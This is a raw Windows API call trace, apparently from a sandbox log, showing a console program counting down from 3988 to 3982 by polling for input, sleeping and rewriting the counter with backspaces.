[0097.306] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0097.306] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbd
[0097.306] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083988") returned 8
[0097.306] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0097.306] __iob_func () returned 0x757a2900
[0097.306] _fileno (_File=0x757a2920) returned 1
[0097.306] _errno () returned 0x5507d8
[0097.306] _get_osfhandle (_FileHandle=1) returned 0x4c
[0097.306] _errno () returned 0x5507d8
[0097.306] GetFileType (hFile=0x4c) returned 0x2
[0097.307] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0097.307] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0097.307] lstrlenW (lpString="\x08\x08\x08\x083988") returned 8
[0097.307] GetConsoleOutputCP () returned 0x1b5
[0097.307] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083988", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0097.307] GetConsoleOutputCP () returned 0x1b5
[0097.307] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083988", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083988", lpUsedDefaultChar=0x0) returned 8
[0097.307] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0097.307] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0097.307] Sleep (dwMilliseconds=0x64)
[0097.493] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0097.493] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbd
[0097.494] Sleep (dwMilliseconds=0x64)
[0097.680] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0097.681] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbd
[0097.681] Sleep (dwMilliseconds=0x64)
[0097.868] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0097.868] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbd
[0097.868] Sleep (dwMilliseconds=0x64)
[0098.070] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0098.071] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbd
[0098.071] Sleep (dwMilliseconds=0x64)
[0098.258] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0098.258] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbe
[0098.258] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083987") returned 8
[0098.258] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0098.258] __iob_func () returned 0x757a2900
[0098.258] _fileno (_File=0x757a2920) returned 1
[0098.258] _errno () returned 0x5507d8
[0098.258] _get_osfhandle (_FileHandle=1) returned 0x4c
[0098.258] _errno () returned 0x5507d8
[0098.258] GetFileType (hFile=0x4c) returned 0x2
[0098.258] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0098.258] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0098.258] lstrlenW (lpString="\x08\x08\x08\x083987") returned 8
[0098.258] GetConsoleOutputCP () returned 0x1b5
[0098.258] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083987", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0098.259] GetConsoleOutputCP () returned 0x1b5
[0098.259] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083987", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083987", lpUsedDefaultChar=0x0) returned 8
[0098.259] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0098.259] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0098.259] Sleep (dwMilliseconds=0x64)
[0098.445] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0098.445] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbe
[0098.445] Sleep (dwMilliseconds=0x64)
[0098.618] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0098.618] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbe
[0098.618] Sleep (dwMilliseconds=0x64)
[0098.804] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0098.804] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbe
[0098.804] Sleep (dwMilliseconds=0x64)
[0098.946] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0098.946] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbe
[0098.946] Sleep (dwMilliseconds=0x64)
[0099.131] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0099.132] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbe
[0099.132] Sleep (dwMilliseconds=0x64)
[0099.319] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0099.319] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbf
[0099.319] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083986") returned 8
[0099.319] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0099.319] __iob_func () returned 0x757a2900
[0099.319] _fileno (_File=0x757a2920) returned 1
[0099.319] _errno () returned 0x5507d8
[0099.319] _get_osfhandle (_FileHandle=1) returned 0x4c
[0099.319] _errno () returned 0x5507d8
[0099.319] GetFileType (hFile=0x4c) returned 0x2
[0099.319] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0099.319] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0099.319] lstrlenW (lpString="\x08\x08\x08\x083986") returned 8
[0099.319] GetConsoleOutputCP () returned 0x1b5
[0099.320] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083986", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0099.320] GetConsoleOutputCP () returned 0x1b5
[0099.320] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083986", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083986", lpUsedDefaultChar=0x0) returned 8
[0099.320] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0099.320] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0099.320] Sleep (dwMilliseconds=0x64)
[0099.506] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0099.507] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbf
[0099.507] Sleep (dwMilliseconds=0x64)
[0099.693] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0099.693] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbf
[0099.693] Sleep (dwMilliseconds=0x64)
[0099.864] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0099.865] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbf
[0099.865] Sleep (dwMilliseconds=0x64)
[0100.053] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0100.053] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbf
[0100.053] Sleep (dwMilliseconds=0x64)
[0100.178] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0100.179] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbf
[0100.179] Sleep (dwMilliseconds=0x64)
[0100.372] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0100.373] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc0
[0100.373] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083985") returned 8
[0100.373] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0100.373] __iob_func () returned 0x757a2900
[0100.373] _fileno (_File=0x757a2920) returned 1
[0100.373] _errno () returned 0x5507d8
[0100.373] _get_osfhandle (_FileHandle=1) returned 0x4c
[0100.373] _errno () returned 0x5507d8
[0100.373] GetFileType (hFile=0x4c) returned 0x2
[0100.373] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0100.373] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0100.373] lstrlenW (lpString="\x08\x08\x08\x083985") returned 8
[0100.373] GetConsoleOutputCP () returned 0x1b5
[0100.373] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083985", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0100.373] GetConsoleOutputCP () returned 0x1b5
[0100.373] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083985", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083985", lpUsedDefaultChar=0x0) returned 8
[0100.373] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0100.374] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0100.374] Sleep (dwMilliseconds=0x64)
[0100.516] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0100.516] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc0
[0100.516] Sleep (dwMilliseconds=0x64)
[0100.613] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0100.613] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc0
[0100.613] Sleep (dwMilliseconds=0x64)
[0100.722] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0100.723] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc0
[0100.723] Sleep (dwMilliseconds=0x64)
[0100.833] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0100.834] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc0
[0100.834] Sleep (dwMilliseconds=0x64)
[0100.941] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0100.941] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc0
[0100.941] Sleep (dwMilliseconds=0x64)
[0101.050] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0101.051] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc0
[0101.051] Sleep (dwMilliseconds=0x64)
[0101.160] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0101.160] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc0
[0101.160] Sleep (dwMilliseconds=0x64)
[0101.268] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0101.269] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc1
[0101.269] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083984") returned 8
[0101.269] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0101.269] __iob_func () returned 0x757a2900
[0101.269] _fileno (_File=0x757a2920) returned 1
[0101.269] _errno () returned 0x5507d8
[0101.269] _get_osfhandle (_FileHandle=1) returned 0x4c
[0101.269] _errno () returned 0x5507d8
[0101.269] GetFileType (hFile=0x4c) returned 0x2
[0101.269] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0101.269] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0101.269] lstrlenW (lpString="\x08\x08\x08\x083984") returned 8
[0101.269] GetConsoleOutputCP () returned 0x1b5
[0101.269] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083984", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0101.269] GetConsoleOutputCP () returned 0x1b5
[0101.269] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083984", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083984", lpUsedDefaultChar=0x0) returned 8
[0101.270] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0101.270] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0101.270] Sleep (dwMilliseconds=0x64)
[0101.380] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0101.380] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc1
[0101.380] Sleep (dwMilliseconds=0x64)
[0101.487] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0101.487] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc1
[0101.487] Sleep (dwMilliseconds=0x64)
[0101.596] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0101.596] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc1
[0101.596] Sleep (dwMilliseconds=0x64)
[0101.705] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0101.706] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc1
[0101.706] Sleep (dwMilliseconds=0x64)
[0101.815] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0101.815] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc1
[0101.815] Sleep (dwMilliseconds=0x64)
[0101.924] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0101.924] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc1
[0101.924] Sleep (dwMilliseconds=0x64)
[0102.033] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0102.033] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc1
[0102.033] Sleep (dwMilliseconds=0x64)
[0102.142] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0102.142] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc1
[0102.142] Sleep (dwMilliseconds=0x64)
[0102.251] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0102.252] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc2
[0102.252] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083983") returned 8
[0102.252] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0102.252] __iob_func () returned 0x757a2900
[0102.252] _fileno (_File=0x757a2920) returned 1
[0102.252] _errno () returned 0x5507d8
[0102.252] _get_osfhandle (_FileHandle=1) returned 0x4c
[0102.252] _errno () returned 0x5507d8
[0102.252] GetFileType (hFile=0x4c) returned 0x2
[0102.252] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0102.252] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0102.252] lstrlenW (lpString="\x08\x08\x08\x083983") returned 8
[0102.252] GetConsoleOutputCP () returned 0x1b5
[0102.252] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083983", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0102.252] GetConsoleOutputCP () returned 0x1b5
[0102.252] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083983", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083983", lpUsedDefaultChar=0x0) returned 8
[0102.252] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0102.253] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0102.253] Sleep (dwMilliseconds=0x64)
[0102.361] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0102.361] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc2
[0102.361] Sleep (dwMilliseconds=0x64)
[0102.470] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0102.470] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc2
[0102.470] Sleep (dwMilliseconds=0x64)
[0102.579] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0102.579] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc2
[0102.579] Sleep (dwMilliseconds=0x64)
[0102.688] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0102.689] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc2
[0102.689] Sleep (dwMilliseconds=0x64)
[0102.797] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0102.799] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc2
[0102.799] Sleep (dwMilliseconds=0x64)
[0102.907] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0102.907] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc2
[0102.907] Sleep (dwMilliseconds=0x64)
[0103.016] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0103.016] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc2
[0103.016] Sleep (dwMilliseconds=0x64)
[0103.125] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0103.125] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc2
[0103.125] Sleep (dwMilliseconds=0x64)
[0103.234] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0103.234] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc3
[0103.234] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083982") returned 8
[0103.235] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0103.235] __iob_func () returned 0x757a2900
[0103.235] _fileno (_File=0x757a2920) returned 1
[0103.235] _errno () returned 0x5507d8
[0103.235] _get_osfhandle (_FileHandle=1) returned 0x4c
[0103.235] _errno () returned 0x5507d8
[0103.235] GetFileType (hFile=0x4c) returned 0x2
[0103.235] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0103.235] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0103.235] lstrlenW (lpString="\x08\x08\x08\x083982") returned 8
[0103.235] GetConsoleOutputCP () returned 0x1b5
[0103.235] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083982", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0103.235] GetConsoleOutputCP () returned 0x1b5
[0103.235] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083982", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083982", lpUsedDefaultChar=0x0) returned 8
[0103.235] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0103.236] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0103.236] Sleep (dwMilliseconds=0x64)
[0103.343] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0103.344] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc3
[0103.344] Sleep (dwMilliseconds=0x64)
